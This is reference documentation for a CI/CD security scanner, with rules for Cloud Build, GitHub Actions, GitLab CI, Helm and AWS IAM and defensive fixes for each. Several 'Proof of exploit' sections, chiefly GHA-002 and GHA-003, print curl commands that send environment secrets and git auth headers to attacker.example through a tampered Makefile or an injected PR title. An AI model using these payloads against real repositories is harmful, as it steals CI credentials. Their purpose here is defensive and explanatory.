Recommendation. Drop options.substitutionOption (the default is MUST_MATCH) or set it explicitly to MUST_MATCH. ALLOW_LOOSE makes Cloud Build expand undefined substitutions to the empty string instead of failing the build. That papers over typos ($_REGON instead of $_REGION), masks unset variables that should have tripped review, and, combined with dynamicSubstitutions: true (GCB-004), widens the command-injection surface by letting attacker-controlled substitution tokens collapse to empty strings inside shell commands.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Migration scenarios where a long-running pipeline pre-dates MUST_MATCH and the operator needs ALLOW_LOOSE temporarily. Suppress with a brief .pipelinecheckignore rationale and an expires: date so the waiver doesn't outlive the migration.
Source: GCB-022 in the Cloud Build provider.
GCB-023: Step references a user substitution not declared in substitutions: MEDIUM
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation.
How this is detected. Walks every step's args: / entrypoint: / env: / dir: / id: / waitFor: for $_NAME tokens (Cloud Build's user-substitution syntax is leading underscore + uppercase / digits / underscore) and cross-references against the top-level substitutions: mapping. Built-in substitutions ($PROJECT_ID, $REPO_NAME, $BRANCH_NAME, $TAG_NAME, $COMMIT_SHA, $SHORT_SHA, $REVISION_ID, $BUILD_ID, $LOCATION, $TRIGGER_NAME, $_HEAD_*, $_BASE_*, $_PR_NUMBER and the $_HEAD_REPO_URL family) are Cloud Build server-set and don't appear in substitutions:; the rule allow-lists them so they don't false-positive.
Recommendation. Add an entry for every $_USER_VAR referenced anywhere in the build to the top-level substitutions: block, either with a sensible default or with an empty string if the trigger always supplies the value. Cloud Build's default options.substitutionOption: MUST_MATCH then fails the build at parse time on undeclared references (catching typos at the gate). With the looser ALLOW_LOOSE opt-in (GCB-022) undeclared references silently expand to the empty string, which masks the bug and quietly broadens any shell command that interpolates the value.
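A minimal sketch of the declared-substitution pattern; the _REGION / _SERVICE names and the deploy step are illustrative:
substitutions:
  _REGION: us-central1   # sensible default
  _SERVICE: ''           # trigger always supplies this one
steps:
  - name: gcr.io/cloud-builders/gcloud
    args: ['run', 'deploy', '$_SERVICE', '--region', '$_REGION']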
Source: GCB-023 in the Cloud Build provider.
GCB-024: Build pushes Docker images but top-level images: is empty LOW
Evidences: CM-8 System Component Inventory, SR-4 Provenance.
How this is detected. Walks step args / entrypoint / cmd looking for docker push (or the buildx imagetools push variant) invocations. When the build has at least one such step but the top-level images: field is missing or empty, the rule fires. Steps that build and push via the gcr.io/cloud-builders/docker builder image are the common case; --push flags on buildx build are also detected. kaniko and buildah push idioms aren't currently detected; those are different builder images entirely.
Recommendation. Add every image the build produces to the top-level images: array (e.g. images: ['gcr.io/$PROJECT_ID/myapp:$COMMIT_SHA']). Cloud Build then verifies the push succeeded before marking the build SUCCESS, records the image in the build's metadata for provenance / Binary Authorization attestation, and surfaces the image in the builds.list --image query. Without it, a push that happens inside a step is invisible to Cloud Build's tracking layer even though the image still lands in the registry.
Known false positives.
- Multi-stage builds where one step pushes an intermediate image to a private cache registry and the final stage pushes the production artifact (which IS in images:) would trip this rule on the cache push. Suppress with --ignore-file when this matches.
Source: GCB-024 in the Cloud Build provider.
GCB-025: Build has no tags for audit / discoverability LOW
Evidences: AU-2 Event Logging, SI-2 Flaw Remediation.
How this is detected. Cloud Build tags are user-defined labels attached to a build. They appear in the build's metadata (tags: field on the Build resource), in every Cloud Logging audit event for the build, and as a filter argument to gcloud builds list --filter='tags:<value>'. Substitution-bearing tags ($BRANCH_NAME, $COMMIT_SHA) count as populated. Cloud Build expands them at submission time.
Recommendation. Add a top-level tags: array to every cloudbuild.yaml: at minimum, an environment tag (prod / staging / dev) and a service tag (backend / frontend / infra). Cloud Build records tags in the build metadata and Cloud Logging entries, so post-incident triage of which build emitted this becomes a single gcloud builds list --filter='tags:prod' query. Without tags, builds are discoverable only by build id, and the id is a UUID with no signal.
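A minimal sketch of a populated tags: block; the tag values are illustrative:
tags:
  - prod
  - backend
  - $BRANCH_NAME   # substitution-bearing tags count as populated; expanded at submission time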
Known false positives.
- Single-purpose project-local builds in a sandbox project may legitimately not need tags. Suppress with --ignore-file if that matches.
Source: GCB-025 in the Cloud Build provider.
GCB-026: Step waitFor: references an unknown step id MEDIUM
Evidences: CM-6 Configuration Settings.
How this is detected. Cloud Build's step dependency graph is built from each step's waitFor: array. A step with no waitFor: runs after all previous steps; a step with waitFor: ['-'] runs at the start of the build; a step with waitFor: ['<id>'] waits for the specific step. There's no validation that the referenced id exists: typo'd ids are silently treated like - (no-wait), so the dependency disappears without warning. This rule catches the silent skip by walking every waitFor: value and cross-referencing it against the set of declared step ids.
Recommendation. Verify every id listed in a step's waitFor: array matches an id: declared on a sibling step in the same build. The special token - (start at the beginning of the build, no dependencies) is the only non-id value Cloud Build accepts. A typo in waitFor: doesn't fail the build; Cloud Build silently skips the wait, so a step that was supposed to run after a setup step ends up running in parallel with it.
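A minimal sketch of a correct id / waitFor pairing; the step contents and bucket name are illustrative:
steps:
  - id: setup
    name: gcr.io/cloud-builders/gsutil
    args: ['cp', 'gs://my-bucket/config.json', '.']   # hypothetical config fetch
  - id: build
    name: gcr.io/cloud-builders/docker
    args: ['build', '-t', 'gcr.io/$PROJECT_ID/myapp:$COMMIT_SHA', '.']
    waitFor: ['setup']   # must match the sibling id exactly; 'set-up' would silently no-wait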
Source: GCB-026 in the Cloud Build provider.
GHA-001: Action not pinned to commit SHA HIGH 🔧 fix
Evidences: RA-5 Vulnerability Monitoring and Scanning, SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Every uses: reference should pin a specific 40-char commit SHA. Tag and branch refs (@v4, @main) can be silently moved to malicious commits by whoever controls the upstream repository; a third-party action compromise will propagate into the pipeline on the next run.
Recommendation. Replace tag/branch references (@v4, @main) with the full 40-char commit SHA. Use Dependabot or StepSecurity to keep the pins fresh.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- tj-actions/changed-files compromise (CVE-2025-30066, March 2025): a malicious commit retagged behind @v1/@v45 shipped CI-secret exfiltration to roughly 23,000 repos that had pinned the action to a mutable tag instead of a commit SHA.
- reviewdog/action-setup compromise (CVE-2025-30154, March 2025): same week, similar mechanism. Tag-pinned consumers auto-pulled the malicious version; SHA-pinned consumers were unaffected.
Proof of exploit.
Tag-pinned reference (vulnerable):
- uses: tj-actions/changed-files@v45
Attack: the upstream maintainer (or anyone who compromises
the upstream repo) force-moves the v45 tag to a malicious
commit:
git tag -f v45
git push --force origin v45
Every consumer's next workflow run pulls the new code
automatically, executing the attacker's payload with the
job's secrets and GITHUB_TOKEN in scope.
Safe: pin to a 40-char commit SHA (immutable):
- uses: tj-actions/changed-files@a284dc1 # v45.0.0
Source: GHA-001 in the GitHub Actions provider.
GHA-002: pull_request_target checks out PR head CRITICAL 🔧 fix
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation, SI-7 Software, Firmware, and Information Integrity.
How this is detected. pull_request_target runs with a write-scope GITHUB_TOKEN and access to repository secrets, deliberately so, since it's how labeling and comment-bot workflows work. When the same workflow then explicitly checks out the PR head (ref: ${{ github.event.pull_request.head.sha }} or .ref) it executes attacker-controlled code with those privileges.
Recommendation. Use pull_request instead of pull_request_target for any workflow that must run untrusted code. If you need write scope, split the workflow: a pull_request_target job that labels the PR, and a separate pull_request-triggered job that builds it with read-only secrets.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- GitHub Security Lab: Preventing pwn requests (2020), the canonical write-up. Demonstrates how a fork PR that lands in a pull_request_target workflow with the PR head checked out runs in the base repo's privileged context.
- Trail of Bits, Codecov-style supply chain via pwn requests (2021): showed the primitive against widely-used Actions workflows. The fix pattern (split the workflow into a privileged labeler + an unprivileged builder) is now standard guidance.
Proof of exploit.
Vulnerable: pull_request_target + checkout PR head =
attacker code runs with secrets + write-scope token.
name: build-pr
on:
  pull_request_target:
    branches: [main]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
Attack: any external contributor opens a fork PR with a
tampered Makefile:
test:
	curl -X POST https://attacker.example/exfil \
	  -d "$(env)" \
	  -d "$(git config --get-all http.https://github.com/.extraheader)"
CI runs the malicious target with the base repo's secrets
(every ${{ secrets.* }} the workflow has access to) and a
write-scope GITHUB_TOKEN. The PR doesn't even need to be
merged or reviewed — the privileged execution happens at
PR-open time.
Safe: split the workflow. The labeler runs with secrets
but never checks out PR head; the builder runs in
pull_request context with no secrets:
name: triage   # privileged half
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  label:
    runs-on: ubuntu-latest
    steps:
      - run: gh pr edit ${{ github.event.number }} --add-label triage
        env:
          GH_TOKEN: ${{ github.token }}
name: build    # unprivileged half
on: { pull_request: {} }
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
Source: GHA-002 in the GitHub Actions provider.
GHA-003: Script injection via untrusted context HIGH 🔧 fix
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation, SA-15 Development Process, Standards, and Tools.
How this is detected. Interpolating attacker-controlled context fields (PR title/body, issue body, comment body, commit message, discussion body, head branch name, github.ref_name, inputs.*, release metadata, deployment payloads) directly into a run: block is shell injection. GitHub expands ${{ ... }} BEFORE shell quoting, so any backtick, $(), or ; in the source field executes.
Recommendation. Pass untrusted values through an intermediate env: variable and reference that variable from the shell script. GitHub's expression evaluation happens before shell quoting, so inline ${{ github.event.* }} is always unsafe.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- GitHub Security Lab disclosure (2020): a sweep of public Actions found dozens of widely-used workflows interpolating github.event.issue.title / pull_request.title directly into shell. Any commenter or PR author could run arbitrary commands in the maintainer's CI.
- Trail of Bits pwn-request research (2021): demonstrated the same primitive against pull_request_target workflows where the runner has secrets and a write-scope token; one fork PR could exfiltrate every secret the workflow could see. Mitigation is the same: never interpolate context into shell, route through env:.
Proof of exploit.
Vulnerable: PR title interpolated straight into shell.
name: triage
on:
  pull_request_target:
    types: [opened, edited]
jobs:
  greet:
    runs-on: ubuntu-latest
    steps:
      - run: |
          echo "New PR: ${{ github.event.pull_request.title }}"
Attack: open a PR with the title:
# foo"; curl -X POST https://attacker.example/exfil \
-d "$(env | base64 -w0)"; echo "
GitHub expands ${{ ... }} BEFORE shell quoting, so the
title's " closes the echo string and the rest of the line
becomes shell. The pull_request_target trigger means the
runner already has secrets and a write-scope GITHUB_TOKEN,
so the curl exfils every secret the workflow can see.
Safe: route through env so the value is never interpolated
into the shell template:
- env:
    PR_TITLE: ${{ github.event.pull_request.title }}
  run: |
    echo "New PR: $PR_TITLE"
Source: GHA-003 in the GitHub Actions provider.
GHA-004: Workflow has no explicit permissions block MEDIUM 🔧 fix
Evidences: AC-6 Least Privilege, CM-6 Configuration Settings, CM-7 Least Functionality.
How this is detected. Without an explicit permissions: block (either top-level or per-job), the GITHUB_TOKEN inherits the repository's default scope, typically write. A compromised step receives far more privilege than it needs.
Recommendation. Add a top-level permissions: block (start with contents: read) and grant additional scopes only on the specific jobs that need them.
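A minimal sketch of the recommended layout, assuming a single job that needs write access; the job name and widened scope are illustrative:
permissions:
  contents: read        # workflow-wide floor
jobs:
  release:
    runs-on: ubuntu-latest
    permissions:
      contents: write   # widened only on the job that needs it
    steps:
      - run: echo "release steps here"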
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Read-only / lint-only workflows that do not call any write-scoped API often pass without an explicit block because the default token scope on public repos is read. The rule defaults to MEDIUM confidence to reflect this.
Source: GHA-004 in the GitHub Actions provider.
GHA-005: AWS auth uses long-lived access keys MEDIUM 🔧 fix
Evidences: IA-5 Authenticator Management.
How this is detected. Long-lived AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY secrets in GitHub Actions can't be rotated on a fine-grained schedule and remain valid until manually revoked. OIDC with role-to-assume yields short-lived credentials per workflow run.
Recommendation. Use aws-actions/configure-aws-credentials with role-to-assume + permissions: id-token: write to obtain short-lived credentials via OIDC. Remove the static AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY secrets.
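A minimal sketch of the OIDC shape; the account ID, role name, and region are placeholders, and the action should be SHA-pinned per GHA-001:
permissions:
  id-token: write
  contents: read
steps:
  - uses: aws-actions/configure-aws-credentials@v4   # pin to a commit SHA in practice
    with:
      role-to-assume: arn:aws:iam::123456789012:role/deploy-role   # placeholder ARN
      aws-region: us-east-1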
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- LocalStack and Moto integration tests set AWS_ENDPOINT_URL to a localhost address and use the sentinel test/test access keys (the LocalStack convention). Those values can't authenticate against real AWS, so the rule auto-suppresses an env block that pairs a localhost endpoint with sentinel keys.
Source: GHA-005 in the GitHub Actions provider.
GHA-034: Reusable workflow called with secrets: inherit MEDIUM 🔧 fix
Evidences: AC-6 Least Privilege, IA-5 Authenticator Management.
How this is detected. Fires on a jobs.<id>.uses: ... reference whose sibling secrets: value is the literal string inherit. This is distinct from GHA-025 (which gates on the pin of the called workflow): inheritance is a problem even when the call is SHA-pinned, because the surface a compromised callee sees is every caller secret instead of just the named ones. Explicit lists also document the contract: reviewers see exactly which secrets cross the workflow boundary.
Recommendation. Replace secrets: inherit with an explicit list of just the secrets the called workflow actually needs (secrets: { NPM_TOKEN: ${{ secrets.NPM_TOKEN }} }). inherit passes every secret the caller can see, including ones the downstream workflow has no business reading. A compromised or buggy reusable workflow can then exfiltrate credentials the caller never intended to share.
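A minimal sketch of the explicit-list shape; the workflow path and secret name are illustrative:
jobs:
  publish:
    uses: my-org/workflows/.github/workflows/release.yml@<commit-sha>
    secrets:
      NPM_TOKEN: ${{ secrets.NPM_TOKEN }}   # the one secret the callee needs; nothing else crosses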
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Single-tenant repos that share their entire secrets set with every reusable workflow by policy. Rare in practice; explicit lists make the secret flow visible and don't add much typing. Suppress with .pipelinecheckignore and a rationale rather than disabling the rule everywhere.
Source: GHA-034 in the GitHub Actions provider.
GHA-035: github-script step interpolates untrusted context HIGH
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation, SI-7 Software, Firmware, and Information Integrity.
How this is detected. GHA-003 covers run: blocks where shell expansion is the injection surface. actions/github-script@<ref> runs the script: input as Node.js inside an authenticated Octokit context, same threat model, different language. The rule fires when script: (or the legacy previews: companion for inline JS) contains a ${{ github.event.* }}, ${{ inputs.* }}, ${{ github.head_ref }}, ${{ github.ref_name }}, or any other untrusted context expression, exactly the same catalog GHA-003 uses.
Recommendation. Pass attacker-controllable values through env: and read them inside the script via process.env.X instead of interpolating ${{ ... }} directly into the script body. GitHub expands the expression before the JavaScript engine parses the source, so backticks, quotes, and ${...} characters in the source field break out of the surrounding string and execute as JavaScript with the workflow's GITHUB_TOKEN in scope.
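A minimal sketch of the env: indirection for github-script; the action should be SHA-pinned per GHA-001:
- uses: actions/github-script@v7   # pin to a commit SHA in practice
  env:
    PR_TITLE: ${{ github.event.pull_request.title }}
  with:
    script: |
      // read via process.env; the value never enters the script source
      const title = process.env.PR_TITLE;
      core.info(`PR title: ${title}`);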
Known false positives.
- Scripts that interpolate ${{ steps.*.outputs.* }} from a trusted upstream step are out of scope (the rule only matches the curated untrusted-context regex). If you intentionally rely on a non-curated context, suppress with a brief .pipelinecheckignore rationale.
Source: GHA-035 in the GitHub Actions provider.
GL-001: Image not pinned to specific version or digest HIGH 🔧 fix
Evidences: SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Floating tags (latest or major-only) can be silently swapped under the job. Every image: reference should pin a specific version tag or digest.
Recommendation. Reference images by @sha256:<digest> or at minimum a full immutable version tag (e.g. python:3.12.1-slim). Avoid :latest and bare tags like :3.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: GL-001 in the GitLab CI provider.
GL-002: Script injection via untrusted commit/MR context HIGH
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation, SI-7 Software, Firmware, and Information Integrity.
How this is detected. CI_COMMIT_MESSAGE / CI_COMMIT_REF_NAME / CI_MERGE_REQUEST_TITLE and friends are populated from SCM event metadata the attacker controls. Interpolating them into a shell body executes the crafted content as part of the build.
Recommendation. Read these values into intermediate variables: entries or shell variables and quote them defensively ("$BRANCH"). Never inline $CI_COMMIT_MESSAGE / $CI_MERGE_REQUEST_TITLE into a shell command.
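A minimal sketch of the variables: indirection; the job name and command are illustrative:
build:
  variables:
    BRANCH: $CI_COMMIT_REF_NAME   # lands in the job environment, not the script text
  script:
    - echo "building $BRANCH"     # defensively quoted shell variable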
Source: GL-002 in the GitLab CI provider.
GL-003: Variables contain literal secret values CRITICAL
Evidences: IA-5 Authenticator Management.
How this is detected. Scans variables: at the top level and on each job for entries whose KEY looks credential-shaped and whose VALUE is a literal string (not a $VAR reference). AWS access keys are detected by value pattern regardless of key name.
Recommendation. Store credentials as protected + masked CI/CD variables in project or group settings, and reference them by name from the YAML. For cloud access prefer short-lived OIDC tokens.
Source: GL-003 in the GitLab CI provider.
GL-004: Deploy job lacks manual approval or environment gate MEDIUM
Evidences: AC-3 Access Enforcement, SA-10 Developer Configuration Management.
How this is detected. A job whose stage or name contains deploy / release / publish / promote should either require manual approval or declare an environment: binding. Otherwise any push to the trigger branch ships to the target.
Recommendation. Add when: manual (optionally with rules: for protected branches) or bind the job to an environment: with a deployment tier so approvals and audit are enforced by GitLab's environment controls.
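A minimal sketch combining the manual gate with an environment binding; the job name and deploy script are illustrative:
deploy_prod:
  stage: deploy
  script:
    - ./deploy.sh   # hypothetical deploy script
  environment:
    name: production
  rules:
    - if: '$CI_COMMIT_BRANCH == "main"'
      when: manual   # a human approves every production deploy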
Source: GL-004 in the GitLab CI provider.
GL-005: include: pulls remote / project without pinned ref HIGH
Evidences: CM-6 Configuration Settings, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Cross-project and remote includes can be silently re-pointed. Branch-name refs (main/master/develop/head) are treated as unpinned; tag and SHA refs are considered safe.
Recommendation. Pin include: project: entries with ref: set to a tag or commit SHA. Avoid include: remote: for untrusted URLs; mirror the content into a trusted project and pin it.
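A minimal sketch of a pinned cross-project include; the project path, tag, and file are illustrative:
include:
  - project: platform/ci-templates
    ref: v2.3.1                  # tag or 40-char commit SHA, never a branch name
    file: /templates/build.yml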
Source: GL-005 in the GitLab CI provider.
HELM-001: Chart.yaml declares legacy apiVersion: v1 MEDIUM 🔧 fix
Evidences: CM-2 Baseline Configuration, SR-3 Supply Chain Controls and Processes.
How this is detected. apiVersion lives at the top of Chart.yaml. v1 is Helm 2's format and uses a sibling requirements.yaml for dependencies; v2 is Helm 3's format and inlines them in Chart.yaml alongside a Chart.lock for digest pinning. Without v2 there is no in-tree dependency manifest to lock, which is why HELM-002 only fires on v2 charts.
Recommendation. Bump Chart.yaml to apiVersion: v2 and migrate any sibling requirements.yaml entries into the dependencies: list inside Chart.yaml. Run helm dependency update to regenerate Chart.lock so HELM-002's per-dependency digest check has something to read. Helm 3 has been the default shipping channel since November 2019; the v1 format is kept for read-compat but blocks lockfile-based supply-chain controls.
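A minimal sketch of the migrated Chart.yaml; the chart name, versions, and repository are illustrative:
apiVersion: v2                   # Helm 3 format
name: myapp
version: 1.4.2
dependencies:                    # moved in from the old requirements.yaml
  - name: postgresql
    version: 12.1.3
    repository: https://charts.example.com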
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: HELM-001 in the Helm provider.
HELM-002: Chart.lock missing per-dependency digests HIGH 🔧 fix
Evidences: SI-7 Software, Firmware, and Information Integrity, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Three failure shapes:
- Chart.yaml declares dependencies but no Chart.lock exists at all.
- Chart.lock exists but its dependencies: list is missing entries declared in Chart.yaml (drift after an edit without re-running helm dependency update).
- Chart.lock lists every dependency but one or more entries lack a digest: field (lock generated by an old Helm 3 version that didn't always populate it).
v1 charts (HELM-001) are skipped. They predate Chart.lock and use requirements.lock against a sibling requirements.yaml. Fix HELM-001 first.
Recommendation. After every change to dependencies: in Chart.yaml, re-run helm dependency update and commit the regenerated Chart.lock. The lock records the resolved version and a sha256:... digest that helm dependency build verifies on download; without it, a compromised chart repo can swap the tarball under the same version and helm install will happily use the substitute.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Charts with no dependencies (the dependencies: key is absent or empty) pass automatically. There is nothing to lock.
Source: HELM-002 in the Helm provider.
HELM-003: Chart dependency declared on a non-HTTPS repository HIGH 🔧 fix
Evidences: SC-8 Transmission Confidentiality and Integrity, SC-13 Cryptographic Protection, SR-3 Supply Chain Controls and Processes.
How this is detected. Walks Chart.yaml dependencies: (v2 charts only) and inspects each entry's repository: URL. Accepted schemes:
- https://, chart-museum / OSS chart repos. The default for public Helm charts.
- oci://, registry-hosted charts. TLS is enforced by the registry, not the URL scheme; we still accept this shape because Helm 3.8+ pulls OCI charts over HTTPS unless explicitly configured otherwise.
- file://, in-repo dependency. No network surface.
- @alias, local alias for a previously registered helm repo add URL. The scheme of the original URL is the user's responsibility (and is captured in the chart consumer's ~/.config/helm/repositories.yaml).
Recommendation. Switch each dependencies[].repository value to an https:// chart repo URL, an oci:// registry reference, or a file:// path for in-repo charts. Plaintext http:// (and other non-TLS schemes like git://) lets any on-path attacker substitute the dependency tarball during helm dependency build; Chart.lock's digest check (HELM-002) only catches that on the next update, not the compromised pull itself.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: HELM-003 in the Helm provider.
HELM-004: Chart dependency version is a range, not an exact pin MEDIUM
Evidences: SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. An exact pin is a string that contains only digits, dots, and at most a single leading v / trailing pre-release or build identifier (1.2.3, v1.2.3, 1.2.3-rc1, 1.2.3+build.5). Anything carrying ^ / ~ / > / < / * / x / X / || / a space (>=4 <5) is treated as a range. The bias is toward false positives: a chart maintainer can suppress per-rule via --ignore-file if they specifically want range semantics, but the default for production charts is a pin.
Recommendation. Replace each dependencies[].version constraint with the exact resolved version from Chart.lock. 17.0.0 instead of ^17.0.0, v1.2.3 instead of ~1.2. Range syntax (^, ~, >=, *, x) lets helm dependency update move every consumer of the chart to a newer dep on the next refresh, even when the lock file looked stable.
Source: HELM-004 in the Helm provider.
HELM-005: Chart maintainers field empty or missing chain-of-custody info LOW
Evidences: SR-3 Supply Chain Controls and Processes, SR-4 Provenance.
How this is detected. A maintainers: entry is considered usable when the value is a YAML mapping with name: set to a non-empty string and at least one of email: / url: populated. Entries that look like - name: TODO or carry blank contact fields fail the rule the same way a missing block does: the field exists but doesn't carry a real chain-of-custody signal.
Recommendation. Populate maintainers: in Chart.yaml with at least one entry carrying a name plus either an email or a url. The name is the human a downstream consumer files an issue against; the contact field is the channel they reach. Charts published to ArtifactHub or an internal registry without this field are silently anonymous, fine for a personal scratch chart, not for one your CI pipeline will deploy to production.
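A minimal sketch of a usable entry; the name and address are placeholders:
maintainers:
  - name: Platform Team        # the human (or team) downstream consumers file issues against
    email: platform@example.com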
Known false positives.
- Library charts (Chart.yaml type: library) often ship without maintainers when distributed inside a single team's monorepo where the org-level CODEOWNERS already names the contact. Suppress with --ignore-file when this matches your situation.
Source: HELM-005 in the Helm provider.
HELM-006: Chart.yaml does not declare a kubeVersion compatibility range LOW
Evidences: CM-2 Baseline Configuration, CM-6 Configuration Settings.
How this is detected. The field is a string carrying a Helm-flavoured SemVer range. Empty / missing fails the rule. Whitespace-only values fail too; an obviously-blank key should not satisfy a posture check.
Recommendation. Add a kubeVersion: SemVer range to Chart.yaml covering the Kubernetes versions you've actually rendered and tested the chart against. >= 1.25.0 < 1.32.0 is the common shape for a chart maintained against the upstream support window. Helm will refuse helm install against a cluster whose kubectl version falls outside the range, catching silent-breakage surprises (removed apiVersions, renamed RBAC verbs, alpha features) at pre-flight rather than at runtime.
Known false positives.
- Library charts (Chart.yaml type: library) that wrap version-agnostic helpers often legitimately ship without kubeVersion. Suppress with --ignore-file when the chart genuinely targets every supported Kubernetes minor.
Source: HELM-006 in the Helm provider.
HELM-007: Chart.yaml description field is empty or missing LOW
Evidences: SR-3 Supply Chain Controls and Processes.
How this is detected. Walks Chart.yaml description: and fires when the field is missing, None, or a string that's empty after stripping whitespace. The Helm chart spec doesn't enforce the field but every chart published to ArtifactHub or the upstream stable repo populates it; production charts that ship without it are usually a copy-paste-from-template oversight.
Recommendation. Set description: in Chart.yaml to a one-sentence summary of what the chart deploys (e.g. description: Postgres 14 cluster with WAL-G backups and a Prometheus exporter). Helm registries display this string in chart listings; without it, anyone browsing has to read the README to figure out what the chart does.
Source: HELM-007 in the Helm provider.
HELM-008: Chart.lock generated more than 90 days ago MEDIUM
Evidences: SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes.
How this is detected. Reads Chart.lock's top-level generated: timestamp (an ISO-8601 string Helm writes when the lock was last regenerated) and compares against now. Fires when the delta is more than 90 days. Charts without a Chart.lock are skipped (HELM-002 covers the missing-lock case directly), and charts whose generated: field is malformed or absent silently pass on this rule.
Recommendation. Run helm dependency update against every dependency-carrying chart at least once per release cycle, and commit the regenerated Chart.lock. The lock pins versions and digests; the update cadence is what brings in CVE fixes and deprecation notices from the last quarter. CI can run the same command against main weekly to surface drift as a PR rather than letting the lock sit stale until the next release.
Known false positives.
- A chart that pins exact versions and never needs new dependencies (e.g. a chart packaging a single internal library that itself updates rarely) may legitimately have a stale Chart.lock. Suppress with --ignore-file when this matches your situation.
Source: HELM-008 in the Helm provider.
HELM-009: Chart home / sources URL uses a non-HTTPS scheme LOW
Evidences: SC-8 Transmission Confidentiality and Integrity, SR-3 Supply Chain Controls and Processes.
How this is detected. Walks Chart.yaml home: (single string) and sources: (list of strings). Fires on any value whose scheme is http://, ftp://, or other plaintext form. Empty / missing fields pass, the rule only evaluates URLs that are populated with the wrong scheme. HELM-003 covers the same risk for dependency-repo URLs.
Recommendation. Switch every home: URL and every entry in sources: to https://. Most chart-listing UIs display these as click-through links from a public chart registry; serving them over plaintext is a confused-deputy footgun for anyone evaluating the chart's provenance. http:// URLs against localhost are not exempted; production charts shouldn't ship references to a developer-local endpoint anyway.
Source: HELM-009 in the Helm provider.
HELM-010: Chart.yaml appVersion field is empty or missing LOW
Evidences: CM-2 Baseline Configuration.
How this is detected. Library charts (Chart.yaml type: library) legitimately don't have an appVersion because they package no application. Those are exempted. For application charts (type: application, the default), appVersion is required for CVE tracking and release-tracking; without it, helm list shows - in the AppVersion column and downstream consumers have no signal.
Recommendation. Set appVersion: in Chart.yaml to the version of the application the chart packages (e.g. appVersion: "17.2" for a Postgres-17.2 chart at version: 1.4.2). When the upstream application releases, bump appVersion and re-cut the chart. Helm's CLI displays appVersion alongside the chart version in helm list, so downstream operators can see which app version is running where.
Source: HELM-010 in the Helm provider.
IAM-001: CI/CD role has AdministratorAccess policy attached CRITICAL
Evidences: AC-3 Access Enforcement, AC-6 Least Privilege.
How this is detected. A CI/CD service role with AdministratorAccess attached turns any pipeline compromise into account compromise. The classic anti-pattern: the role started narrow, the pipeline grew, someone attached AdministratorAccess to unblock a deploy, and it never came off.
Recommendation. Replace AdministratorAccess with least-privilege policies.
Source: IAM-001 in the AWS provider.
IAM-002: CI/CD role has wildcard Action in attached policy HIGH
Evidences: AC-3 Access Enforcement, AC-6 Least Privilege.
How this is detected. Action: '*' (or service-prefix wildcards like s3:*) on an attached policy is functionally equivalent to AdministratorAccess for that resource. The wildcard absorbs every new IAM action AWS adds, so the role's authority grows without any local change.
Recommendation. Replace wildcard actions with specific IAM actions.
Source: IAM-002 in the AWS provider.
IAM-003: CI/CD role has no permission boundary MEDIUM
Evidences: AC-2 Account Management, AC-6 Least Privilege.
How this is detected. A permissions boundary is the maximum-permission ceiling for a role. Without one, every future PR that attaches another inline / managed policy raises the role's effective authority indefinitely. With a boundary in place, the policy churn happens beneath a fixed cap that your security team owns separately.
Recommendation. Attach a permissions boundary defining max permissions.
Source: IAM-003 in the AWS provider.
IAM-004: CI/CD role can PassRole to any role HIGH
Evidences: AC-3 Access Enforcement, AC-6 Least Privilege.
How this is detected. iam:PassRole with Resource: '*' lets the principal hand any role to any service. Combined with a service that runs your code (Lambda, ECS, CodeBuild, EC2 Instance Profiles), this is role-hop privilege escalation: launch an ephemeral resource configured with a higher-privileged role, run code under that identity, exfil. Scoping by ARN + iam:PassedToService removes the escalation path.
Recommendation. Restrict iam:PassRole to specific role ARNs and add an iam:PassedToService condition.
